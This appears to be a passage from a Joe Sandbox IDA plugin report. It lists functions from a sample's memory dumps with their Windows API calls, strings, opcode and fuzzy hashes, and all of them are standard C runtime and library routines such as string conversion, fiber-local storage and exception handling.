Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200

Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300

Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340

Function 00007FFE1A514CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A514E72
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A51519B

Strings

csm, xrefs: 00007FFE1A514E1B
csm, xrefs: 00007FFE1A514DB9
csm, xrefs: 00007FFE1A514E99

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction ID: 0617e5b028956466e08e3a571b01e219ec4ebd4f1838f5efbf8982716a2d8bad
Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction Fuzzy Hash: C4E1C472B0CB828AE7519F36D4402BD3BB1FB46B68F1411B6DA8D57666DF38E481C700

Function 00007FFE1A5195BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A5195CB
FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A519601
FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51962E
FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51963F
FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A519650
SetLastError.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51966B

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction ID: 294ecd9cbcfe1625919d203323795a2e890604e5968f0c1276960b53027c7311
Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction Fuzzy Hash: F1115C24B0CE4286FA546363559117921639F46FF0F8447F7E83E866F6DE2CA4418210

Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001385B
LeaveCriticalSection.KERNEL32 ref: 0000000140013872
SetEvent.KERNEL32 ref: 000000014001387F
WaitForSingleObject.KERNEL32 ref: 0000000140013891
CloseHandle.KERNEL32 ref: 000000014001389E
CloseHandle.KERNEL32 ref: 00000001400138AB

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 3326452711-0
Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705

Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 00000001400037D3
#4.VSELOG ref: 0000000140003823
EnterCriticalSection.KERNEL32 ref: 000000014000382F
LeaveCriticalSection.KERNEL32 ref: 00000001400038B7

Strings

amps_Exec: pHandle=%p, execId=%d, iParam=%d, xrefs: 000000014000380B

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
API String ID: 2984211723-1229430080
Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740

Function 00007FFE1A517F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFE1A517F4D
GetProcAddress.KERNEL32 ref: 00007FFE1A517F63
FreeLibrary.KERNEL32 ref: 00007FFE1A517F8A

Strings

CorExitProcess, xrefs: 00007FFE1A517F5C
mscoree.dll, xrefs: 00007FFE1A517F44

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction ID: cc6e9927e9ae361ad265774bd4d681b0ad353e873e8847fb938c48f3df052600
Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction Fuzzy Hash: 05F0446571DE06C1EB104B65A44477A6322AF46FB1F5402F7D55D451F4DF3CD045C740

Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
ExitProcess.KERNEL32 ref: 0000000140008545

Strings

mscoree.dll, xrefs: 0000000140008518
CorExitProcess, xrefs: 000000014000852A

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340

Function 00007FFE1A5140D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FFE1A5141F7
__AdjustPointer.LIBCMT ref: 00007FFE1A514242

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction ID: dfa8a47e8e8d099b9f3685c968c8f572eaa1b06f84ebfce588191cde8389bf3a
Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction Fuzzy Hash: C9B1A1A5B0EE4281EA65DB53D04023D6BA2AF56FA4F0994F7DA5D077A6DF2CE4818300

Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140009F76

Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0

GetFileType.KERNEL32 ref: 000000014000A11C

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301

Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E3E
GetLastError.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E5E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E9B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009EBB

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00

Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7

Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
WriteConsoleA.KERNEL32 ref: 000000014000FE32

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00

Function 00007FFE1A51FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFE1A51FB7C
_set_statfp.LIBCMT ref: 00007FFE1A51FB97
_set_statfp.LIBCMT ref: 00007FFE1A51FBB3
_set_statfp.LIBCMT ref: 00007FFE1A51FBEF

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction ID: 4c66fb6570d3b2361dc4d94958eeff089919dbb898f476bea13e0e95e66983e9
Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction Fuzzy Hash: 54119476F1CE0B41F754116AE5F637912436FABBB4F1446F7E5AE063FA8E2CA8484101

Function 00007FFE1A519684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196A3
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196C2
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196EA
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196FB
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A51970C

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction ID: bec66f72274ef4cde7cc6df405f19775c8c2e263caf48d2b5596f8c1e90a6592
Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction Fuzzy Hash: 5E115E24F0CA4289FA58A727659117961A39F47FF0F5443F7E83E866F6EE2CF4418200

Function 00007FFE1A519518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFE1A519529
FlsSetValue.KERNEL32 ref: 00007FFE1A519548
FlsSetValue.KERNEL32 ref: 00007FFE1A519570
FlsSetValue.KERNEL32 ref: 00007FFE1A519581
FlsSetValue.KERNEL32 ref: 00007FFE1A519592

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction ID: 78ad703d96acf2ff8486db924497f0dce39870cd7231b4f618812a97da081c60
Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction Fuzzy Hash: 6B115A54F0CA038AFA68A663549117921A34F53F74F5507F7D83E9A6F2ED2CB4418200

Function 00007FFE1A515448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE1A5154B8
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A515503

Strings

RCC, xrefs: 00007FFE1A5154D4
MOC, xrefs: 00007FFE1A5154CC

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction ID: 9ea521ba9b9547fd75e1f6027c28664a4c332a7af49d2ff03a5552e07416e182
Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction Fuzzy Hash: 43919F73B08B818AE750CB76D4802BD7BA1FB46BA8F1441BAEA4D17B65DF38D195C700

Function 00007FFE1A513A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A513A63
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1A513AFA
RtlUnwindEx.KERNEL32 ref: 00007FFE1A513B54

Strings

csm, xrefs: 00007FFE1A513AE1

Memory Dump Source

